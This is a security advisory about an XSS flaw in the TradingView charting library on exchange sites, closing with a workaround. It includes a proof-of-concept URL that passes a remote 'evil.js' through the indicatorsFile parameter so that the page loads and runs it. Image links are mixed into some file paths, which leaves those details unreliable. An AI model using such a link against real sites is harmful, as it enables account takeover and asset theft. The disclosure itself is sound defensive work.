Recently, a security platform exposed the high-risk vulnerability of TradingView. The security team of RatingToken from Cheetah Mobile Blockchain Security Center assisted multiple cooperative digital currency exchanges at the very first time, to test and repair the TradingView XSS vulnerability. The details are as follow:
Background:
TradingView, an open source and free Candlestick chart analysis tool, is widely used in digital currency and stock exchanges. XSS vulnerabilities can bypass the existing defense mechanism to compromise user accounts, or even arbitrarily transfer assets thereof.
Recurrence:
We found the vulnerability by testing the official website of an exchange.
Accessing
https://www.***.com/assets/chart/charting_library/static, we traversed the directory and found where the vulnerability lies
https://cdn-images-1.medium.com/max/800/1*WpGF4q_0_sOaxpdWhmLzaQ.png/charting_library/static/tv-chart.630b704a2b991e1354cb09.html (630b704a2b991e1354cb09 may change per different contexts) quotes
the script bundles/library.19c99ed5d03091e1354cb09.js (19c99ed5d03091e1354cb09 may change per different contexts)
https://cdn-images-1.medium.com/max/800/1*HF_Fau77r2wOKHc2nudBjw.pngAccess
https://www.***.com/assets/chart/charting_library/static/tvchart.630b704a2b9d0eaf1593.html#disabledFeatures=[]&enabledFeatures= []&indicatorsFile=https://***/evil.js
we can see from the picture below that the .js script has been triggered.
https://cdn-images-1.medium.com/max/800/1*juRxoQFhQmOr8zLyI2-gRA.pngAnalysis:
In the above recurrence verification, it can be seen that there must be three parameters: disabledFeatures, enabledFeatures and indicatorsFile.
https://cdn-images-1.medium.com/max/800/1*lfXxWjPUAAUz0Wq-JyLkuA.pngIt can be seen in the code that the disabledFeatures and enabledFeatures parameters are of illegal formats, and therefore reported errors and stopped working.
While indicatorFile, the most critical parameter for the vulnerability, is used in the code as follows:
https://cdn-images-1.medium.com/max/800/1*edbiS4XlXfU28jqijaq8tg.png$.getScript loads and executes a JavaScript file from the server via HTTP GET request.
If the victim clicks the constructed link as above, the remote malicious .js file passed by the attacker will be executed, which will result in compromised user accounts, malicious wallet operations and asset loss.
Defense plan
The temporary solution that users can take themselves is:
Disable indicatorsFile parameter in the .js file that starts with library under the bundles directory of the TradingView library.
RatingToken:
https://ratingtoken.io/?from=medium